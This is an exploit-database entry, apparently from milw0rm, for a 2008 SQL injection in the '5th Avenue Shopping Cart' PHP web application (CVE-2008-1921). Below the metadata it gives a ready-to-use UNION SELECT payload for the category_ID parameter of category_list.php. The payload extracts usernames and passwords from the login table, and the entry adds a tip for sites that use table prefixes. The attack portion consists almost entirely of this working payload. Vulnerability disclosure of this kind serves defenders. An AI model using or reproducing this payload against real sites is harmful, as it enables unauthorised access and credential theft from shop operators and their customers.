EXPLOITS

5th Avenue Shopping Cart - 'category_id' SQL Injection

Author: Aria-Security Team
type: webapps
platform: php
port: 
date_added: 2008-04-17  
date_updated: 2016-11-22  
verified: 1  
codes: OSVDB-44534;CVE-2008-1921  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 5464.txt  

Aria-Security Team (Persian Security Team)
http://Aria-Security.Net (Persian)
http://Aria-Security.com (ENG)
--------------------------------------------
5th avenue Shopping Cart SQL Injection
Greetz: AurA, Kinglet, NULL


category_list.php?category_ID=-1/**/UNION/**/SELECT/**/1,username,password,4,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/login/*

note: if error says :table login does not exist the website is using a prefix for tables.


Regards,
The-0utl4w

# milw0rm.com [2008-04-18]